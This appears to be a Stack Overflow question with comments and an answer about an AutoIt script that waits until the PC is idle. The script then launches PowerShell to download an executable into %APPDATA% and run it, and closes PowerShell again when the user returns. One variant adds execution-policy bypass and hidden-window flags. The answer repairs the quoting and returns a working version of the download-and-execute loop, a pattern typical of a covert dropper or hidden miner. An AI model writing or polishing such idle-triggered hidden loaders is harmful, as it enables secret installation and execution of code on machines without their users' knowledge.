# Run powershell from autoit

Tags: powershell, autoit

I'm trying to run the following AutoIt program

```
#include <Timers.au3>
While 1
   Sleep(10)
   $idleTimer = _Timer_GetIdleTime()
   If $idleTimer > 600 And Not ProcessExists("powershell.exe") Then
       $sPSCmd = (New-Object Net.WebClient).DownloadFile("url","$env:APPDATA\file.exe"); cd $env:APPDATA\; .\file.exe
       RunWait(@comspec & ' /c powershell.exe -command "&' & $sPSCmd & '"')
   ElseIf $idleTimer < 10 Then
      ProcessClose("powershell.exe")
   EndIf
WEnd
```

But I'm getting the error `"Unable to parse the line"`

Also tried

```
#include <Timers.au3>
While 1
   Sleep(10)
   $idleTimer = _Timer_GetIdleTime()
   If $idleTimer > 600 And Not ProcessExists("powershell.exe") Then
       $sPSCmd = (New-Object Net.WebClient).DownloadFile("url","$env:APPDATA\file.exe"); cd $env:APPDATA\; .\file.exe
       RunWait(RunWait("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -command "&' & $sPSCmd & '"')
   ElseIf $idleTimer < 10 Then
      ProcessClose("powershell.exe")
   EndIf
WEnd
```

But here I get the error `"Unterminated string"`

How can I do so everytime a pc is idle to run this command?

About the ProcessExists and ProcessClose, Am I doing this correctly?

Thanks

EDIT:

Doing

```
#include <Timers.au3>
While 1
  Sleep(10)
  $idleTimer = _Timer_GetIdleTime()
  If $idleTimer > 600 And Not ProcessExists("powershell.exe") Then
    $sPSCmd = '(New-Object Net.WebClient).DownloadFile(\"url\",\"$env:APPDATA\file.exe\"); cd $env:APPDATA\; .\file.exe'
    RunWait('powershell.exe -command "' & $sPSCmd & '"')
  ElseIf $idleTimer < 10 Then
    ProcessClose("powershell.exe")
  EndIf
WEnd
```

Fixed and now it doesn't return any error anymore but the commands are not being placed as if run directly on powershell.

What I was trying

```
#include <Timers.au3>
While 1
  Sleep(10)
  $idleTimer = _Timer_GetIdleTime()
  If $idleTimer > 600 And Not ProcessExists("powershell.exe") Then
    $sPSCmd = '(New-Object Net.WebClient).DownloadFile(\"https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe",\"$env:APPDATA\putty.exe\"); cd $env:APPDATA\; .\putty.exe'
    RunWait('powershell.exe -ep bypass -nop -w hidden -command "' & $sPSCmd & '"')
  ElseIf $idleTimer < 10 Then
    ProcessClose("powershell.exe")
  EndIf
WEnd
```

What can be failing here?

Comment: In your 'Also tried' code you have an extra `'` at the end of the `RunWait` line. Change the end of that line from `'"')` to `'")`. That should resolve the unterminated string error.

Comment: You are missing quotes around the PowerShell command. Try this: `$sPSCmd = '(New-Object Net.WebClient).DownloadFile("url","$env:APPDATA\file.exe"); cd $env:APPDATA\; .\file.exe'`

Comment: @TheMadTechnician have done that but still getting the same error message

Answer (score 0):

Building on the helpful comments, and leaving the incidental quoting error in your code aside:

- The string containing the PowerShell command you're assigning to variable `$sPSCmd` needs quoting.
- Because the string is a PowerShell command that is passed to [`powershell.exe`](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe)'s `-Command` parameter, any `"` characters that are part of the command must be escaped as `\"` (sic).
- Call `powershell.exe` directly - no need for `@comspec & ' /c powershell.exe ...` - with the entire PowerShell command passed to `-Command` enclosed in `"..."`

  - `powershell.exe`'s directory can be assumed to be listed in the `PATH` environment variable, so there is no strict need to invoke it by its full path - though you may choose to do so for security reasons.

To put it all together (untested; note that you'll need to supply an actual URL for placeholder `url`):

```
#include <Timers.au3>
While 1
  Sleep(10)
  $idleTimer = _Timer_GetIdleTime()
  If $idleTimer > 600 And Not ProcessExists("powershell.exe") Then
    $sPSCmd = '(New-Object Net.WebClient).DownloadFile(\"url\",\"$env:APPDATA\file.exe\"); cd $env:APPDATA\; .\file.exe'
    RunWait('powershell.exe -command "' & $sPSCmd & '"')
  ElseIf $idleTimer < 10 Then
    ProcessClose("powershell.exe")
  EndIf
WEnd
```